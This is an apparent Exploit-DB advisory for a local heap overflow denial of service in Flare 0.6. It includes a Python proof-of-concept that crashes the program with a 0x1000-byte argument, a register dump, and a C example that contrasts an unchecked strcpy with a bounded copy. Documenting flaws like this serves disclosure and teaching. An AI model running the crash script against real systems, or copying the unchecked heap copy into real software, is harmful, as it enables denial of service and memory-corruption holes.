Vendor: Flare
Author: l3D
CVSS: 7.8 (HIGH)
Vulnerability Type: Heap Overflow
CWE: 119
Product Name: Flare
Affected Version From: 0.6
Affected Version To: 0.6
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7, Windows XP SP2 and some Linux distributions
Published: 2010

Flare <= 0.6 local heap overflow DoS

Flare version 0.6 is vulnerable to a local heap overflow that results in a denial of service. The bug is triggered by passing an oversized command-line argument (a long string of 'A's) to the program: the argument is copied into a heap buffer that is too small for it, adjacent heap memory is overwritten, and the process crashes. The register dump included with the script shows how far the overrun reaches: EDX and EDI hold 0x41414141 (the 'AAAA' pattern), EBX is partially overwritten, ECX points at the string of 'A's, and EIP ends up inside ntdll. A Python proof-of-concept script that launches Flare with a 0x1000-byte argument is included below.
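As an added illustration (not Flare's own code, which the page does not show), the following C program contrasts the unchecked heap-copy pattern behind CWE-119 with a length-checked version that refuses an argument of the size the proof-of-concept script passes (0x1000 bytes). The 64-byte buffer size, the function names and the sample argument are assumptions made for this example only.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical fixed-size heap buffer chosen for this illustration;
 * the size of Flare's real buffer is not stated on the page. */
#define ARG_BUF_SIZE 64

/* The CWE-119 pattern: a heap allocation of fixed size receives a
 * caller-controlled argument with no length check.  An argument longer
 * than ARG_BUF_SIZE overwrites whatever follows the buffer on the heap,
 * which is why the register dump in the PoC ends up holding 0x41414141
 * ('AAAA').  Shown for contrast only; never called with oversized input. */
char *copy_arg_unchecked(const char *arg)
{
    char *buf = malloc(ARG_BUF_SIZE);
    if (buf == NULL)
        return NULL;
    strcpy(buf, arg);   /* unbounded: overflows when strlen(arg) >= ARG_BUF_SIZE */
    return buf;
}

/* Hardened form: measure first, reject anything that does not fit
 * (including the terminating NUL), then copy with an explicit bound. */
char *copy_arg_checked(const char *arg)
{
    size_t len = strlen(arg);
    if (len >= ARG_BUF_SIZE)        /* leave room for the NUL terminator */
        return NULL;
    char *buf = malloc(ARG_BUF_SIZE);
    if (buf == NULL)
        return NULL;
    memcpy(buf, arg, len + 1);      /* bounded copy, NUL included */
    return buf;
}

/* Returns 1 if a 0x1000-byte argument of 'A's (the PoC's input) is rejected. */
int rejects_oversized_arg(void)
{
    char *arg = malloc(0x1000 + 1);
    if (arg == NULL)
        return 0;
    memset(arg, 'A', 0x1000);       /* constructed oversized argument */
    arg[0x1000] = '\0';
    char *copy = copy_arg_checked(arg);
    int rejected = (copy == NULL);
    free(copy);
    free(arg);
    return rejected;
}

/* Returns 1 if a normal-length argument is accepted and copied intact. */
int accepts_normal_arg(void)
{
    const char *arg = "flare.exe";  /* constructed sample argument */
    char *copy = copy_arg_checked(arg);
    int ok = (copy != NULL && strcmp(copy, arg) == 0);
    free(copy);
    return ok;
}

int main(int argc, char **argv)
{
    const char *arg = argc > 1 ? argv[1] : "flare.exe";
    char *copy = copy_arg_checked(arg);
    if (copy == NULL) {
        fprintf(stderr, "argument of %zu bytes exceeds the %d-byte limit; refusing\n",
                strlen(arg), ARG_BUF_SIZE - 1);
        return 1;
    }
    printf("accepted argument: %s\n", copy);
    free(copy);
    return 0;
}
```

Run it with a long argument (for example the output of a 4096-character string) and the checked path exits with an error instead of corrupting the heap; the same input handed to the unchecked function is the situation the register dump on this page records.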

Mitigation:

Upgrade to the latest version of Flare.

Exploit-DB raw data:

# Exploit Title: Flare <= 0.6 local heap overflow DoS
# Date: 3/7/2010
# Author: l3D
# Software Link: http://www.nowrap.de/download/flare06doswin.zip
# Version: 0.6
# Tested on: Windows 7, Windows XP SP2 and some linux distributions
# Code:

#!/usr/bin/env python
#IRC: irc.nix.co.il
#Site: xraysecurity.blogspot.com <---- Coming soon!

#Registers:
#EAX 003E0000
#ECX 003E1088 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..."
#EDX 41414141
#EBX 00004141
#ESP 0022FB0C
#EBP 0022FBDC
#ESI 003E1080
#EDI 41414141
#EIP 77195B44 ntdll.77195B44

import os
import sys

# Optional first argument: path to the Flare binary (defaults to flare.exe
# in the current directory).
if len(sys.argv) > 1:
    path = sys.argv[1]
else:
    path = 'flare.exe'

if not os.path.exists(path):
    print('Usage: python %s [path to flare.exe]' % sys.argv[0])
    sys.exit(1)

# Replace this process with Flare, passing a single 0x1000-byte argument of
# 'A' (0x41); the oversized argument overruns a heap buffer and crashes it.
os.execl(path, path, 'A' * 0x1000)